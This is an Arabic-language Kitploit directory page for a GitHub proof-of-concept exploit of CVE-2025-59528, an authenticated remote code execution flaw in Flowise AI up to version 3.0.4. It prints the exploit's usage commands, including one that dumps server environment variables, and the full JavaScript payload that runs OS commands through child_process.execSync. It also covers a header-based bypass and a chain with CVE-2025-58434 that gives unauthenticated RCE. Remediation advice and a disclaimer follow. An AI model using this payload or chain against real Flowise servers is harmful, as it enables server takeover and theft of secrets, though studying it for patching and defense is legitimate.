Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Flowise-RCE-CVE-2025-59528 — استغلال تنفيذ تعليمات برمجية عن بُعد (RCE) يتطلب مصادقة لإصدارات Flowise AI ≤ 3.0.4. يستغل ثغرة في نقطة النهاية /api/v1/node-load-method/customMCP لتنفيذ أوامر نظام تعسفية عبر Node.js child_process.execSync(). يتضمن سكريبت PoC كاملًا وخطوات الإصلاح. | Kitploit
أدوات/GitHubGitHub/r3nsi15/flowise-rce-cve-2025-59528
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليمتطوير الحمولات
GitHubr3nsi15/flowise-rce-cve-2025-59528

Flowise-RCE-CVE-2025-59528

استغلال تنفيذ تعليمات برمجية عن بُعد (RCE) يتطلب مصادقة لإصدارات Flowise AI ≤ 3.0.4. يستغل ثغرة في نقطة النهاية /api/v1/node-load-method/customMCP لتنفيذ أوامر نظام تعسفية عبر Node.js child_process.execSync(). يتضمن سكريبت PoC كاملًا وخطوات الإصلاح.

عرض المستودع
11منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-59528 — تنفيذ التعليمات البرمجية عن بُعد (RCE) المُصادق عليه في Flowise AI

نظرة عامة

معرف CVE: CVE-2025-59528
البرنامج المتأثر: Flowise AI
الإصدارات المعرضة للخطر: <= 3.0.4
الإصدار المُصحح: 3.0.5 وما بعده
الخطورة: حرجة
المؤلف: r3nsi15
التاريخ: 2025

الوصف

تسمح إصدارات Flowise AI حتى الإصدار 3.0.4 شاملة للمستخدم المُصادق عليه بتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) على الخادم المضيف عن طريق إرسال حمولة JavaScript مصممة بعناية إلى نقطة النهاية /api/v1/node-load-method/customMCP.

تقبل طريقة التحميل الخاصة بعقدة customMCP مدخلات يتحكم فيها المستخدم يتم تقييمها من جهة الخادم ككود JavaScript، دون تعقيم أو عزل مناسب. من خلال حقن حمولة تستغل child_process.execSync الخاص بـ Node.js، يمكن للمهاجم تنفيذ أوامر نظام تشغيل تعسفية بصلاحيات عملية خادم Flowise.

تتطلب نقطة النهاية أيضًا وجود ترويسة x-request-from: internal.

نقطة النهاية المتأثرة

نقطة النهايةالطريقةالمصادقة مطلوبةالغرض
/api/v1/auth/loginPOSTلاالمصادقة والحصول على الجلسة
/api/v1/node-load-method/customMCPPOSTنعم (كوكي الجلسة)نقطة نهاية طريقة التحميل المعرضة للخطر

إثبات المفهوم

الملف: CVE-2025-59528_POC.py

المتطلبات

  • Python 3.x
  • مكتبة requests
  • بيانات اعتماد صالحة لأي حساب مستخدم على مثيل Flowise المستهدف
root@kitploit:~
pip install requests

الاستخدام

root@kitploit:~
python3 CVE-2025-59528_POC.py -e <email> -i <target_url> -p <password> -c <command>

الوسائط

العلامةالصيغة الطويلةمطلوبالوصف
-e--emailنعمعنوان البريد الإلكتروني للمستخدم المُصادق عليه
-i--urlنعمعنوان URL الأساسي لمثيل Flowise
-p--passwordنعمكلمة مرور المستخدم المُصادق عليه
-c--cmdنعمأمر نظام التشغيل المراد تنفيذه على الخادم

أمثلة

التحقق من تنفيذ التعليمات البرمجية:

root@kitploit:~
python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "id"

استرجاع متغيرات بيئة الخادم:

root@kitploit:~
python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "env"

المخرجات المتوقعة

root@kitploit:~
[+] Logged in
[+] Exploit sent
[+] Status: 200

تفصيل الحمولة

يحقن الاستغلال تعبير JavaScript التالي في حقل mcpServerConfig:

root@kitploit:~
({x:(function(){
    const cp = process.mainModule.require('child_process');
    cp.execSync('<command>');
    return 1;
})()})
  • process.mainModule.require('child_process') — يحمّل وحدة تنفيذ العمليات المدمجة في Node.js.
  • execSync('<command>') — ينفذ أمر نظام التشغيل المقدَّم من المهاجم بشكل متزامن.
  • يُغلَّف التعبير بالكامل في حرفية كائن لضمان تقييمه بشكل سليم داخل سياق JavaScript الخاص بالخادم.

كما تُضاف ترويسة x-request-from: internal إلى الطلب لتجاوز فحص الأصل الداخلي الذي قد يعترض الطلب بخلاف ذلك.

السبب الجذري

تمرر نقطة النهاية customMCP المدخلات المقدَّمة من المستخدم مباشرة إلى سياق تقييم JavaScript على الخادم دون تعقيم أو عزل. وبالاقتران مع الوصول غير المقيد إلى وحدات Node.js الأساسية (وتحديدًا child_process) عبر process.mainModule.require، يخلق هذا ثغرة RCE سهلة الاستغلال للغاية. لا يوفر فحص ترويسة x-request-from أي حدود أمنية ذات معنى لأنه لا يتم التحقق منه مقابل أي مصدر موثوق.

الربط مع CVE-2025-58434

يمكن ربط هاتين الثغرتين لإنشاء مسار هجوم RCE غير مُصادق عليه ضد مثيلات Flowise التي تعمل بإصدارات <= 3.0.4:

  1. استخدم CVE-2025-58434 لإعادة تعيين كلمة مرور أي حساب معروف (بدون الحاجة إلى مصادقة مسبقة).
  2. سجّل الدخول ببيانات الاعتماد الجديدة.
  3. استخدم CVE-2025-59528 لتنفيذ أوامر نظام تشغيل تعسفية على الخادم.

المعالجة

  • قم بالترقية إلى Flowise AI 3.0.5 أو أحدث، والذي يزيل أو يعزل مسار التقييم المعرض للخطر بشكل صحيح.
  • لا تقم أبدًا بتقييم سلاسل يتحكم فيها المستخدم ككود برمجي في سياق من جهة الخادم.
  • قيّد الوصول إلى وحدات Node.js الخطرة (child_process, fs, وغيرها) عبر عزل مناسب (مثل vm2 أو سياقات معزولة أو إزالة الوصول إلى process.mainModule).
  • تحقق من ترويسة x-request-from وصادق عليها عبر آلية من جهة الخادم بدلاً من فحص سلسلة بسيط.
  • طبّق مبدأ الامتياز الأقل على عملية خادم Flowise.

إخلاء المسؤولية

تم توفير إثبات المفهوم هذا لأغراض البحث الأمني التعليمي والمصرح به فقط. استخدام هذا البرنامج النصي ضد أنظمة دون إذن كتابي صريح يعد غير قانوني وغير أخلاقي. لا يتحمل المؤلف والمساهمون أي مسؤولية عن سوء الاستخدام.

تنزيل الأداة